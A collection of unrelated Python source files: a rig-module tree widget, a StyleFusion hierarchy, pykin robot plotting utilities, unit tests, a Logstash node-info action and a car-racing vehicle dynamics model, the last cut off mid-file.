actionRemove.triggered.connect(functools.partial(self.ui.treeWidget.itemDoubleClicked.emit, sel[0], 0))
actionRemove = menu.addAction("Remove")
actionRemove.triggered.connect(functools.partial(self.on_remove))
# Expose decorated functions
inst = sel[0].rig
def is_exposed(val):
if not hasattr(val, '__can_show__'):
return False
fn = getattr(val, '__can_show__')
if fn is None:
return False
# if not inspect.ismethod(fn):
# return False
return val.__can_show__()
functions = inspect.getmembers(inst, is_exposed)
if functions:
menu.addSeparator()
for fn_name, fn in functions:
fn_nicename = fn_name.replace('_', ' ').title()
fn = functools.partial(self._execute_rcmenu_entry, fn_name)
action = menu.addAction(fn_nicename)
action.triggered.connect(fn)
menu.exec_(QtGui.QCursor.pos())
def _execute_rcmenu_entry(self, fn_name):
need_export_network = False
for module in self.get_selected_modules():
# Resolve fn
if not hasattr(module, fn_name):
continue
fn = getattr(module, fn_name)
if not inspect.ismethod(fn):
continue
# Call fn
log.debug("Calling {0} on {1}".format(fn_name, module))
fn()
if constants.UIExposeFlags.trigger_network_export in fn._flags:
need_export_network = True
if need_export_network:
self.needExportNetwork.emit()
def on_module_double_clicked(self, item):
if hasattr(item, "rig"):
self._set_text_block(item, item.rig.name)
self._is_modifying = True # Flag to know that we are currently modifying the name
self.ui.treeWidget.editItem(item, 0)
def focus_in_module(self, event):
# Set back the text with the information about the module in it
if self._is_modifying:
sel = self.ui.treeWidget.selectedItems()
if sel:
self._set_text_block(sel[0], str(sel[0].rig))
# sel[0].setText(0, str(sel[0].rig))
self._is_modifying = False
self.focusInEvent(event)
def on_lock_selected(self):
need_update = False
for item in self.ui.treeWidget.selectedItems():
val = item.rig
if isinstance(val, classModule.Module) and not val.locked:
need_update = True
val.locked = True
if need_update:
ui_shared._update_network(self._rig)
self.update()
def on_unlock_selected(self):
need_update = False
for item in self.ui.treeWidget.selectedItems():
val = item.rig
if isinstance(val, classModule.Module) and val.locked:
need_update = True
val.locked = False
if need_update:
ui_shared._update_network(self._rig)
self.update()
def on_remove(self):
for item in self.ui.treeWidget.selectedItems():
module = item.rig
# net = item.net if hasattr(item, "net") else None
try:
if module.is_built():
module.unbuild()
self._rig.remove_module(module)
            except Exception as e:
                log.error("Error removing {0}. Received {1}. {2}".format(module, type(e).__name__, str(e).strip()))
traceback.print_exc()
self.needExportNetwork.emit()
|
499082
|
import torch
from stylefusion.fusion_net import FusionNet
class SFHierarchyFFHQ:
def __init__(self):
self.nodes = dict()
self.nodes["clothes"] = SFNode("clothes")
self.nodes["mouth"] = SFNode("mouth")
self.nodes["eyes"] = SFNode("eyes")
self.nodes["bg"] = SFNode("bg")
self.nodes["hair"] = SFNode("hair")
self.nodes["skin"] = SFNode("skin")
self.nodes["skin_mouth"] = SFNode("skin_mouth", child1=self.nodes["mouth"], child2=self.nodes["skin"])
self.nodes["face"] = SFNode("face", child1=self.nodes["skin_mouth"], child2=self.nodes["eyes"])
self.nodes["bg_clothes"] = SFNode("bg_clothes", child1=self.nodes["clothes"], child2=self.nodes["bg"])
self.nodes["bg_hair_clothes"] = SFNode("bg_hair_clothes",
child1=self.nodes["bg_clothes"], child2=self.nodes["hair"])
self.nodes["all"] = SFNode("all", child1=self.nodes["face"], child2=self.nodes["bg_hair_clothes"])
class SFHierarchyCar:
def __init__(self):
self.nodes = dict()
self.nodes["wheels"] = SFNode("wheels")
self.nodes["car_body"] = SFNode("car_body")
self.nodes["background_top"] = SFNode("background_top")
self.nodes["background_bottom"] = SFNode("background_bottom")
self.nodes["car"] = SFNode("car", child1=self.nodes["car_body"], child2=self.nodes["wheels"])
self.nodes["background"] = SFNode("background",
child1=self.nodes["background_top"], child2=self.nodes["background_bottom"])
self.nodes["all"] = SFNode("all", child1=self.nodes["car"], child2=self.nodes["background"])
class SFHierarchyChurch:
    def __init__(self):
self.nodes = dict()
self.nodes["church"] = SFNode("church")
self.nodes["background"] = SFNode("background")
self.nodes["all"] = SFNode("all", child1=self.nodes["church"], child2=self.nodes["background"])
class SFNode:
def __init__(self, name, child1=None, child2=None):
self.name = name
self.child1 = child1
self.child2 = child2
self.fusion_net = None
if child1 is None or child2 is None:
assert child1 is None and child2 is None
self._leaf = True
else:
self._leaf = False
def get_all_parts(self):
if self._leaf:
return [self.name]
else:
return [self.name] + self.child1.get_all_parts() + self.child2.get_all_parts()
def get_all_active_parts(self):
if self.fusion_net is None:
return [self.name]
else:
return [self.name] + self.child1.get_all_active_parts() + self.child2.get_all_active_parts()
def get_fusion_nets_amount(self):
if self.fusion_net is None:
return 0
if self._leaf:
return 1
else:
return 1 + self.child1.get_fusion_nets_amount() + self.child2.get_fusion_nets_amount()
def get_fusion_nets(self):
if self.fusion_net is None:
return []
if self._leaf:
return [self.fusion_net]
else:
return [self.fusion_net] + self.child1.get_fusion_nets() + self.child2.get_fusion_nets()
def forward(self, s_dict):
if self.fusion_net is None:
return s_dict[self.name]
if not (self.child1.name in s_dict.keys() and self.child2.name in s_dict.keys()):
return s_dict[self.name]
return self.fusion_net(
self.child1.forward(s_dict),
self.child2.forward(s_dict),
s_dict[self.name])
def load_fusion_net(self, path):
data = torch.load(path)
self.fusion_net = FusionNet()
if "state_dict" in data.keys():
data = data["state_dict"]
self.fusion_net.load_state_dict(data)
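# Hedged usage sketch (illustrative only): build the church hierarchy and walk it
# with no FusionNet checkpoint loaded. With fusion_net left as None, forward()
# falls back to the latent of the queried node, so no weight file is needed.
# The 512-dimensional latent below is an assumed size, not taken from this module.
if __name__ == "__main__":
    hierarchy = SFHierarchyChurch()
    root = hierarchy.nodes["all"]
    print(root.get_all_parts())           # ['all', 'church', 'background']
    print(root.get_fusion_nets_amount())  # 0 until fusion nets are loaded
    s_dict = {"all": torch.randn(1, 512)}
    print(root.forward(s_dict).shape)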
|
499092
|
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
from pykin.utils import transform_utils as tf
# Colors of each direction's axis, e.g. X is green
directions_colors = ["green", "cyan", "orange"]
def init_3d_figure(name=None, figsize=(15, 7.5), dpi=80):
"""
Initializes 3d figure
"""
    fig = plt.figure(name, figsize=figsize, dpi=dpi)
ax = fig.add_subplot(111, projection='3d')
return fig, ax
def show_figure():
"""
Show figure
"""
plt.show()
def _check_color_type(color):
"""
Check color's data type
"""
if isinstance(color, str):
color = color
if isinstance(color, list):
if len(color) == 0:
color = 'k'
else:
color = color[0]
if isinstance(color, np.ndarray):
if len(color) == 0:
color = np.array([0.2, 0.2, 0.2, 1.])
else:
color = color
if isinstance(color, dict):
if len(color) == 0:
color = np.array([0.2, 0.2, 0.2, 1.])
else:
color = list(color.values())[0]
return color
def plot_basis(robot=None, ax=None):
"""
Plot a frame fitted to the robot size
"""
if robot is not None:
offset = np.linalg.norm(robot.offset.pos)
else:
offset = 1
if offset == 0:
offset = 1
ax.set_xlim3d([-1.0 * offset, 1.0 * offset])
ax.set_xlabel('X')
ax.set_ylim3d([-1.0 * offset, 1.0 * offset])
ax.set_ylabel('Y')
ax.set_zlim3d([-1.0 * offset, 1.0 * offset])
ax.set_zlabel('Z')
ax.plot([0, offset * 1.5], [0, 0], [0, 0],
c=directions_colors[0], label="X")
ax.plot([0, 0], [0, offset * 1.5], [0, 0],
c=directions_colors[1], label="Y")
ax.plot([0, 0], [0, 0], [0, offset * 1.5],
c=directions_colors[2], label="Z")
def plot_robot(
robot,
ax=None,
transformations=None,
visible_collision=False,
visible_text=True,
visible_scatter=True,
visible_basis=True):
"""
Plot robot
"""
if transformations is None:
transformations = robot.init_transformations
name = robot.robot_name
if visible_basis:
plot_basis(robot, ax)
links = []
nodes = []
transformation_matrix = []
for i, (link, transformation) in enumerate(transformations.items()):
links.append(link)
transformation_matrix.append(transformation.h_mat)
eef_idx = 0
for i, (link, matrix) in enumerate(zip(links, transformation_matrix)):
nodes.append(tf.get_pos_mat_from_homogeneous(matrix))
if link == robot.eef_name:
eef_idx=i
if name == "baxter":
plot_baxter(nodes, ax, visible_text, visible_scatter)
else:
lines = ax.plot([x[0] for x in nodes], [x[1] for x in nodes], [
x[2] for x in nodes], linewidth=2, label=name)
if visible_text:
label = '(%0.4f, %0.4f, %0.4f)' % (
nodes[eef_idx][0], nodes[eef_idx][1], nodes[eef_idx][2])
ax.text(nodes[eef_idx][0], nodes[eef_idx][1],
nodes[eef_idx][2], label, size="8")
if visible_scatter:
ax.scatter([x[0] for x in nodes], [x[1] for x in nodes],
[x[2] for x in nodes], s=20, c=lines[0].get_color())
if visible_collision:
plot_collision(robot, transformations, ax)
ax.legend()
def plot_baxter(nodes, ax, visible_text=True, visible_scatter=True):
"""
Plot baxter robot
"""
torso_nodes = [nodes[0]] + [nodes[3]]
head_nodes = torso_nodes + nodes[7:12]
pedestal_nodes = torso_nodes + [nodes[6]]
right_nodes = torso_nodes + nodes[13:18] + nodes[20:29]
left_nodes = torso_nodes + nodes[31:36] + nodes[38:47]
head_lines = ax.plot([x[0] for x in head_nodes], [x[1] for x in head_nodes], [
x[2] for x in head_nodes], linewidth=5, label="head")
pedestal_lines = ax.plot([x[0] for x in pedestal_nodes], [x[1] for x in pedestal_nodes], [
x[2] for x in pedestal_nodes], linewidth=5, label="pedestal")
right_lines = ax.plot([x[0] for x in right_nodes], [x[1] for x in right_nodes], [
x[2] for x in right_nodes], linewidth=5, label="right arm")
left_lines = ax.plot([x[0] for x in left_nodes], [x[1] for x in left_nodes], [
x[2] for x in left_nodes], linewidth=5, label="left arm")
if visible_text:
head_label = '(%0.4f, %0.4f, %0.4f)' % (
head_nodes[-1][0], head_nodes[-1][1], head_nodes[-1][2])
pedestal_label = '(%0.4f, %0.4f, %0.4f)' % (
pedestal_nodes[-1][0], pedestal_nodes[-1][1], pedestal_nodes[-1][2])
right_label = '(%0.4f, %0.4f, %0.4f)' % (
right_nodes[8][0], right_nodes[8][1], right_nodes[8][2])
left_label = '(%0.4f, %0.4f, %0.4f)' % (
left_nodes[8][0], left_nodes[8][1], left_nodes[8][2])
ax.text(head_nodes[-1][0], head_nodes[-1][1],
head_nodes[-1][2], head_label, size="8")
ax.text(pedestal_nodes[-1][0], pedestal_nodes[-1][1],
pedestal_nodes[-1][2], pedestal_label, size="8")
ax.text(right_nodes[-1][0], right_nodes[-1][1],
right_nodes[-1][2], right_label, size="8")
ax.text(left_nodes[-1][0], left_nodes[-1][1],
left_nodes[-1][2], left_label, size="8")
if visible_scatter:
ax.scatter([x[0] for x in head_nodes], [x[1] for x in head_nodes],
[x[2] for x in head_nodes], s=30, c=head_lines[0].get_color())
ax.scatter([x[0] for x in pedestal_nodes], [x[1] for x in pedestal_nodes],
[x[2] for x in pedestal_nodes], s=30, c=pedestal_lines[0].get_color())
ax.scatter([x[0] for x in right_nodes], [x[1] for x in right_nodes],
[x[2] for x in right_nodes], s=30, c=right_lines[0].get_color())
ax.scatter([x[0] for x in left_nodes], [x[1] for x in left_nodes],
[x[2] for x in left_nodes], s=30, c=left_lines[0].get_color())
def plot_trajectories(ax, path, size=10, color='r'):
"""
Plot plot_trajectories
"""
ax.scatter([x for (x, y, z) in path], [y for (x, y, z) in path], [z for (x, y, z) in path], s=size, c=color)
def plot_animation(
robot,
trajectory,
fig=None,
ax=None,
eef_poses=None,
objects=None,
visible_objects=False,
visible_collision=False,
visible_text=True,
visible_scatter=True,
interval=100,
repeat=False
):
"""
Plot animation
"""
def update(i):
# print(f"{i/len(trajectory) * 100:.1f} %")
if i == len(trajectory)-1:
# print(f"{i/(len(trajectory)-1) * 100:.1f} %")
print("Animation Finished..")
ax.clear()
if visible_objects and objects:
plot_objects(ax, objects)
if eef_poses is not None:
plot_trajectories(ax, eef_poses)
plot_robot(
robot,
transformations=trajectory[i],
ax=ax,
visible_collision=visible_collision,
visible_text=visible_text,
visible_scatter=visible_scatter)
ani = animation.FuncAnimation(fig, update, np.arange(len(trajectory)), interval=interval, repeat=repeat)
plt.show()
def plot_objects(ax, objects):
"""
Plot objects
"""
for key, value in objects:
o_type = value[0]
o_param = value[1]
o_pose = value[2]
if o_type == "mesh":
plot_mesh(ax, mesh=o_param, A2B=o_pose, alpha=0.3)
if o_type == "sphere":
plot_sphere(ax, radius=o_param, p=o_pose, alpha=0.8, color='g')
if o_type == "box":
A2B = tf.get_h_mat(o_pose)
plot_box(ax, size=o_param, A2B=A2B, alpha=0.8, color='b')
if o_type == "cylinder":
A2B = tf.get_h_mat(o_pose)
plot_cylinder(ax, radius=o_param[0], length=o_param[1], A2B=A2B, n_steps=100, alpha=0.8, color='r')
def plot_collision(robot, transformations, ax, alpha=0.8):
"""
Plot robot's collision
"""
def _get_color(params):
color = []
if params is not None:
visual_color = params.get('color')
if visual_color is not None:
color = list(visual_color.keys())
return color
for link, transformation in transformations.items():
A2B = np.dot(transformation.h_mat, robot.links[link].collision.offset.h_mat)
color = _get_color(robot.links[link].visual.gparam)
if robot.links[link].collision.gtype == 'cylinder':
length = float(robot.links[link].collision.gparam.get('length'))
radius = float(robot.links[link].collision.gparam.get('radius'))
plot_cylinder(ax, length=length, radius=radius, A2B=A2B, alpha=alpha, color=color)
if robot.links[link].collision.gtype == 'sphere':
radius = float(robot.links[link].collision.gparam.get('radius'))
pos = A2B[:3,-1]
plot_sphere(ax, radius=radius, p=pos, n_steps=20, alpha=alpha, color=color)
if robot.links[link].collision.gtype == 'box':
size = robot.links[link].collision.gparam.get('size')
plot_box(ax, size, A2B=A2B, alpha=alpha, color=color)
def plot_cylinder(ax=None, length=1.0, radius=1.0,
A2B=np.eye(4), n_steps=100,
alpha=1.0, color="k"):
"""
Plot cylinder
"""
color = _check_color_type(color)
axis_start = A2B.dot(np.array([0, 0, -length/2, 1]))[:3]
axis_end = A2B.dot(np.array([0, 0, length/2, 1]))[:3]
axis = axis_end - axis_start
axis /= length
not_axis = np.array([1, 0, 0])
if (axis == not_axis).all():
not_axis = np.array([0, 1, 0])
n1 = np.cross(axis, not_axis)
n1 /= np.linalg.norm(n1)
n2 = np.cross(axis, n1)
t = np.array([0, length])
theta = np.linspace(0, 2 * np.pi, n_steps)
t, theta = np.meshgrid(t, theta)
X, Y, Z = [axis_start[i] + axis[i] * t
+ radius * np.sin(theta) * n1[i]
+ radius * np.cos(theta) * n2[i] for i in [0, 1, 2]]
ax.plot_surface(X, Y, Z, color=color, alpha=alpha, linewidth=0)
def plot_sphere(ax=None, radius=1.0, p=np.zeros(3), n_steps=20, alpha=1.0, color="k"):
"""
Plot sphere
"""
color = _check_color_type(color)
phi, theta = np.mgrid[0.0:np.pi:n_steps * 1j, 0.0:2.0 * np.pi:n_steps * 1j]
x = p[0] + radius * np.sin(phi) * np.cos(theta)
y = p[1] + radius * np.sin(phi) * np.sin(theta)
z = p[2] + radius * np.cos(phi)
ax.plot_surface(x, y, z, color=color, alpha=alpha, linewidth=0)
def plot_box(ax=None, size=np.ones(3), alpha=1.0, A2B=np.eye(4), color="k"):
"""
Plot box
"""
color = _check_color_type(color)
if not isinstance(size, np.ndarray):
size = np.array(size)
corners = np.array([
[0, 0, 0],
[0, 0, 1],
[0, 1, 0],
[0, 1, 1],
[1, 0, 0],
[1, 0, 1],
[1, 1, 0],
[1, 1, 1]
])
corners = (corners - 0.5) * size
PA = np.hstack(
(corners, np.ones((len(corners), 1))))
corners = np.dot(PA, A2B.T)[:, :3]
p3c = Poly3DCollection(np.array([
[corners[0], corners[1], corners[2]],
[corners[1], corners[2], corners[3]],
[corners[4], corners[5], corners[6]],
[corners[5], corners[6], corners[7]],
[corners[0], corners[1], corners[4]],
[corners[1], corners[4], corners[5]],
[corners[2], corners[6], corners[7]],
[corners[2], corners[3], corners[7]],
[corners[0], corners[4], corners[6]],
[corners[0], corners[2], corners[6]],
[corners[1], corners[5], corners[7]],
[corners[1], corners[3], corners[7]],
]))
p3c.set_alpha(alpha)
p3c.set_facecolor(color)
ax.add_collection3d(p3c)
def plot_path_planner(path, ax):
"""
Plot rrt* path planner
"""
if path is None:
print("cannot create path")
return
ax.scatter([x for (x, y, z) in path], [y for (x, y, z) in path], [z for (x, y, z) in path], s=10, c='r')
ax.plot([x for (x, y, z) in path], [y for (x, y, z) in path], [z for (x, y, z) in path], '-b', linewidth=0.5,)
ax.text(path[0][0], path[0][1], path[0][2], 'Start', verticalalignment='bottom', horizontalalignment='center', size="20")
ax.text(path[-1][0], path[-1][1], path[-1][2],'Goal', verticalalignment='bottom', horizontalalignment='center', size="20")
def plot_mesh(ax=None, mesh=None, A2B=np.eye(4),
s=np.array([1.0, 1.0, 1.0]), ax_s=1, wireframe=False,
convex_hull=False, alpha=1.0, color="k"):
vertices = mesh.vertices * s
vertices = np.hstack((vertices, np.ones((len(vertices), 1))))
vertices = np.dot(vertices, A2B.T)[:, :3]
vectors = np.array([vertices[[i, j, k]] for i, j, k in mesh.faces])
surface = Poly3DCollection(vectors)
surface.set_facecolor(color)
surface.set_alpha(alpha)
ax.add_collection3d(surface)
def plot_normal_vector(ax, vertices, normals, scale=1, linewidths=(1,), edgecolor="red"):
if vertices.ndim != 2:
vertices = vertices.reshape(1, -1)
if normals.ndim != 2:
normals = normals.reshape(1, -1)
ax.quiver(
[vertex[0] for vertex in vertices],
[vertex[1] for vertex in vertices],
[vertex[2] for vertex in vertices],
[normal[0]*scale for normal in normals],
[normal[1]*scale for normal in normals],
[normal[2]*scale for normal in normals], linewidths=linewidths, edgecolor=edgecolor)
def plot_axis(
ax,
pose,
axis=[1, 1, 1],
scale=0.1
):
if axis[0]:
plot_normal_vector(ax, pose[:3, 3], pose[:3, 0], scale=scale, edgecolor="red")
if axis[1]:
plot_normal_vector(ax, pose[:3, 3], pose[:3, 1], scale=scale, edgecolor="green")
if axis[2]:
plot_normal_vector(ax, pose[:3, 3], pose[:3, 2], scale=scale, edgecolor="blue")
def plot_vertices(ax, vertices, s=5, c='k'):
if vertices.ndim != 2:
vertices = vertices.reshape(1, -1)
ax.scatter([x[0] for x in vertices], [x[1] for x in vertices],
[x[2] for x in vertices], s=s, c=c)
def plot_line(ax, vertices, linewidth=1):
if vertices.ndim != 2:
vertices = vertices.reshape(1, -1)
ax.plot(
[x[0] for x in vertices],
[x[1] for x in vertices],
[x[2] for x in vertices], linewidth=linewidth)
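# Hedged usage sketch (not part of pykin): draw only the world frame and a short
# poly-line path with the helpers above. No robot model is loaded, so plot_basis()
# falls back to its default unit-sized frame; the path coordinates are made up.
if __name__ == "__main__":
    fig, ax = init_3d_figure("demo")
    plot_basis(robot=None, ax=ax)
    path = [(0.0, 0.0, 0.0), (0.1, 0.1, 0.1), (0.2, 0.1, 0.3)]
    plot_trajectories(ax, path, size=20, color='b')
    plot_line(ax, np.array(path))
    show_figure()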
|
499100
|
import unittest
from neo.rawio.elanrawio import ElanRawIO
from neo.test.rawiotest.common_rawio_test import BaseTestRawIO
class TestElanRawIO(BaseTestRawIO, unittest.TestCase):
rawioclass = ElanRawIO
entities_to_test = [
'elan/File_elan_1.eeg'
]
entities_to_download = [
'elan',
]
if __name__ == "__main__":
unittest.main()
|
499153
|
import datetime
from django.test import TestCase
from django.utils import timezone
from helium.auth.tests.helpers import userhelper
from helium.planner.models import Reminder
from helium.planner.tests.helpers import coursegrouphelper, coursehelper, homeworkhelper, eventhelper, reminderhelper
__author__ = "<NAME>"
__copyright__ = "Copyright 2019, Helium Edu"
__version__ = "1.4.38"
class TestCaseReminder(TestCase):
def test_parent_change_triggers_reminder_update(self):
# GIVEN
user = userhelper.given_a_user_exists()
event = eventhelper.given_event_exists(user)
course_group = coursegrouphelper.given_course_group_exists(user)
course = coursehelper.given_course_exists(course_group)
homework = homeworkhelper.given_homework_exists(course)
reminder1 = reminderhelper.given_reminder_exists(user, event=event)
reminder2 = reminderhelper.given_reminder_exists(user, homework=homework)
# WHEN
event.start = datetime.datetime(2019, 5, 8, 12, 0, 0, tzinfo=timezone.utc)
event.save()
homework.start = datetime.datetime(2019, 1, 8, 10, 0, 0, tzinfo=timezone.utc)
homework.save()
# THEN
reminder1 = Reminder.objects.get(pk=reminder1.id)
reminder2 = Reminder.objects.get(pk=reminder2.id)
self.assertEqual(reminder1.start_of_range, datetime.datetime(2019, 5, 8, 11, 45, 0, tzinfo=timezone.utc))
self.assertEqual(reminder2.start_of_range, datetime.datetime(2019, 1, 8, 9, 45, 0, tzinfo=timezone.utc))
|
499163
|
import komand
from .schema import NodeInput, NodeOutput
# Custom imports below
from urllib.parse import urljoin
from komand_logstash.util import utils
import requests
class Node(komand.Action):
TYPES = ["pipeline", "os", "jvm"]
def __init__(self):
super(self.__class__, self).__init__(
name="node",
description="Retrieves information about the node",
input=NodeInput(),
output=NodeOutput(),
)
def run(self, params={}):
url = urljoin(self.connection.url, "/_node")
types = params.get("types")
if types:
error_types = utils.check_types(self.TYPES, types)
if error_types:
self.logger.error("Logstash: Node Info: invalid types %s", ",".join(error_types))
raise Exception("Logstash: Node: Invalid types", types)
r = requests.get(url, params=params)
return {"response": utils.serialize(r.json())}
def test(self):
url = urljoin(self.connection.url, "_node")
r = requests.get(url)
if r.status_code != 200:
raise Exception("%s (HTTP status: %s)" % (r.text, r.status_code))
return {"status_code": r.status_code}
|
499194
|
import torch
import car_racing_simulator.Track as Track
import numpy as np
import copy
class VehicleModel():
def __init__(self,n_batch,device,config):
self.device = device
self.track = Track.Track(config)
self.track_s = torch.from_numpy(self.track.s).type(torch.FloatTensor).to(self.device)
self.track_kappa = torch.from_numpy(self.track.kappa).type(torch.FloatTensor).to(self.device)
self.track_phi = torch.from_numpy(self.track.phi).type(torch.FloatTensor).to(self.device)
self.track_X = torch.from_numpy(self.track.X).type(torch.FloatTensor).to(self.device)
self.track_Y = torch.from_numpy(self.track.Y).type(torch.FloatTensor).to(self.device)
self.track_d_upper = torch.from_numpy(self.track.d_upper).type(torch.FloatTensor).to(self.device)
self.track_d_lower = torch.from_numpy(self.track.d_lower).type(torch.FloatTensor).to(self.device)
self.track_angle_upper = torch.from_numpy(self.track.border_angle_upper).type(torch.FloatTensor).to(self.device)
self.track_angle_lower = torch.from_numpy(self.track.border_angle_lower).type(torch.FloatTensor).to(self.device)
self.n_full_state = config['n_state']
self.n_control = config["n_control"]
self.n_batch = n_batch
# Model Parameters
self.Cm1 = 0.287
self.Cm2 = 0.054527
self.Cr0 = 0.051891
self.Cr2 = 0.000348
self.B_r = 3.3852 / 1.2
self.C_r = 1.2691
self.D_r = 1. * 0.1737 * 1.2
self.B_f = 2.579
self.C_f = 1.2
self.D_f = 1.05 * .192
self.mass = 0.041
self.mass_long = 0.041
self.I_z = 27.8e-6
self.l_f = 0.029
self.l_r = 0.033
self.L = 0.06
self.W = 0.03
self.tv_p = 0
self.Ts = 0.03
def dynModel(self, x, u):
k1 = self.dx(x, u)
k2 = self.dx(x + self.Ts / 2. * k1, u)
k3 = self.dx(x + self.Ts / 2. * k2, u)
k4 = self.dx(x + self.Ts * k3, u)
x_next = x + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.)
return x_next
def dx(self, x, u):
f = torch.empty(self.n_batch, self.n_full_state,device=self.device)
phi = x[:, 2]
v_x = x[:, 3]
v_y = x[:, 4]
r = x[:, 5]
delta = u[:, 1]
r_tar = delta * v_x / (self.l_f + self.l_r)
[F_rx, F_ry, F_fy] = self.forceModel(x, u)
f[:, 0] = v_x * torch.cos(phi) - v_y * torch.sin(phi)
f[:, 1] = v_x * torch.sin(phi) + v_y * torch.cos(phi)
f[:, 2] = r
f[:, 3] = 1 / self.mass_long * (F_rx - F_fy * torch.sin(delta) + self.mass * v_y * r)
f[:, 4] = 1 / self.mass * (F_ry + F_fy * torch.cos(delta) - self.mass * v_x * r)
f[:, 5] = 1 / self.I_z * (F_fy * self.l_f * torch.cos(delta) - F_ry * self.l_r + self.tv_p * (r_tar - r))
return f
def slipAngle(self, x, u):
v_x = x[:, 3]
v_y = x[:, 4]
r = x[:, 5]
delta = u[:, 1]
alpha_f = -torch.atan((self.l_f * r + v_y) / (v_x+1e-5)) + delta
alpha_r = torch.atan((self.l_r * r - v_y) / (v_x+1e-5))
return alpha_f, alpha_r
def forceModel(self, x, u):
v_x = x[:, 3]
v_y = x[:, 4]
r = x[:, 5]
D = u[:, 0]
delta = u[:, 1]
alpha_f = -torch.atan((self.l_f * r + v_y) / (v_x+1e-5)) + delta
alpha_r = torch.atan((self.l_r * r - v_y) / (v_x+1e-5))
F_rx = self.Cm1 * D - self.Cm2*v_x*D - self.Cr2*v_x**2 - self.Cr0
F_ry = self.D_r * torch.sin(self.C_r * torch.atan(self.B_r * alpha_r))
F_fy = self.D_f * torch.sin(self.C_f * torch.atan(self.B_f * alpha_f))
return F_rx, F_ry, F_fy
def compLocalCoordinates(self, x):
x_local = torch.zeros(self.n_batch,7)
dist = torch.zeros(self.n_batch,self.track.N)
for i in range(self.track.N):
dist[:,i] = (x[:,0] - self.track_X[i])**2 + (x[:,1] - self.track_Y[i])**2
min_index = torch.argmin(dist, dim=1)
# min_dist = torch.sqrt(dist[:,min_index])
# if min_dist > 0.4:
# print(min_index)
for i in range(self.n_batch):
# print(min_index[i])
if dist[i,min_index[i]] <= 1e-13:
s = self.track_s[min_index[i]]
d = 0
                mu = x[i, 2] - self.track_phi[min_index[i]]
kappa = self.track_kappa[min_index[i]]
x_local[i, :] = torch.tensor([s, d, mu, x[i, 3], x[i, 4], x[i, 5], kappa])
else:
a = torch.zeros(2)
b = torch.zeros(2)
a[0] = x[i, 0] - self.track_X[min_index[i]]
a[1] = x[i, 1] - self.track_Y[min_index[i]]
b[0] = self.track_X[min_index[i]+1] - self.track_X[min_index[i]]
b[1] = self.track_Y[min_index[i]+1] - self.track_Y[min_index[i]]
# a = self.vecToPoint(min_index, x)
# b = self.vecTrack(min_index)a
cos_theta = (torch.dot(a, b) / (torch.norm(a) * torch.norm(b)))
# print("cos(theta): ",cos_theta)
if cos_theta < 0:
min_index[i] = min_index[i] - 1
if min_index[i] < 0:
min_index[i] = self.track.N - 1
a[0] = x[i, 0] - self.track_X[min_index[i]]
a[1] = x[i, 1] - self.track_Y[min_index[i]]
b[0] = self.track_X[min_index[i] + 1] - self.track_X[min_index[i]]
b[1] = self.track_Y[min_index[i] + 1] - self.track_Y[min_index[i]]
cos_theta = (torch.dot(a, b) / (torch.norm(a) * torch.norm(b)))
# print("cos(theta): ",cos_theta)
if cos_theta >= 1:
cos_theta = torch.tensor(0.9999999)
rela_proj = torch.norm(a) * cos_theta / torch.norm(b)
# print("realtive projection: ",rela_proj)
rela_proj = max(min(rela_proj, 1), 0)
# print("realtive projection: ",rela_proj)
theta = torch.acos(cos_theta)
error_sign = -torch.sign(a[0] * b[1] - a[1] * b[0])
error = error_sign * torch.norm(a) * torch.sin(theta)
if error != error:
error = 0.0
# print(min_index[i])
next_min_index = min_index[i] + 1
                if next_min_index >= self.track.N:
next_min_index = 0
s = self.track_s[min_index[i]] + (rela_proj * (-self.track_s[min_index[i]] + self.track_s[next_min_index]))
d = error
mu = self.wrapMu(x[i,2] - (self.track_phi[min_index[i]] + (rela_proj * (-self.track_phi[min_index[i]] + self.track_phi[next_min_index]))))
kappa = self.track_kappa[min_index[i]] + (rela_proj * (-self.track_kappa[min_index[i]] + self.track_kappa[next_min_index]))
if s!=s:
print(s)
x_local[i,:] = torch.tensor([s, d, mu, x[i,3], x[i,4], x[i,5], kappa])
return x_local
def dynModelCurve(self, x, u):
k1 = self.dxCurve(x, u).to(self.device)
k2 = self.dxCurve(x + self.Ts / 2. * k1, u).to(self.device)
k3 = self.dxCurve(x + self.Ts / 2. * k2, u).to(self.device)
k4 = self.dxCurve(x + self.Ts * k3, u).to(self.device)
x_next = x + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.).to(self.device)
return x_next
def dynModelBlend(self, x, u):
blend_ratio = (x[:,3] - 0.3)/(0.2)
lambda_blend = np.min([np.max([blend_ratio,0]),1])
# blend_max = torch.max(torch.cat([blend_ratio.view(-1,1), torch.zeros(blend_ratio.size(0),1)],dim=1),dim=1)
# blend_min = torch.min(torch.cat([blend_max.values.view(-1, 1), torch.ones(blend_max.values.size(0), 1)], dim=1), dim=1)
# lambda_blend = blend_min.values
if lambda_blend <1:
v_x = x[:,3]
v_y = x[:, 4]
x_kin = torch.cat([x[:,0:3], torch.sqrt(v_x*v_x + v_y*v_y).reshape(-1,1)],dim =1)
k1 = self.dxkin(x_kin, u).to(self.device)
k2 = self.dxkin(x_kin + self.Ts / 2. * k1, u).to(self.device)
k3 = self.dxkin(x_kin + self.Ts / 2. * k2, u).to(self.device)
k4 = self.dxkin(x_kin + self.Ts * k3, u).to(self.device)
x_kin_state = x_kin + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.).to(self.device)
delta = u[:, 1]
beta = torch.atan(self.l_r * torch.tan(delta) / (self.l_f + self.l_r))
v_x_state = x_kin_state[:,3] * torch.cos(beta) # V*cos(beta)
v_y_state = x_kin_state[:,3] * torch.sin(beta) # V*sin(beta)
yawrate_state = v_x_state * torch.tan(delta)/(self.l_f + self.l_r)
x_kin_full = torch.cat([x_kin_state[:,0:3],v_x_state.view(-1,1),v_y_state.view(-1,1), yawrate_state.view(-1,1)],dim =1)
if lambda_blend ==0:
return x_kin_full
if lambda_blend >0:
k1 = self.dxCurve(x, u).to(self.device)
k2 = self.dxCurve(x + self.Ts / 2. * k1, u).to(self.device)
k3 = self.dxCurve(x + self.Ts / 2. * k2, u).to(self.device)
k4 = self.dxCurve(x + self.Ts * k3, u).to(self.device)
x_dyn = x + self.Ts * (k1 / 6. + k2 / 3. + k3 / 3. + k4 / 6.).to(self.device)
if lambda_blend ==1:
return x_dyn
return x_dyn*lambda_blend + (1-lambda_blend)*x_kin_full
def dynModelBlendBatch(self, x, u_unclipped):
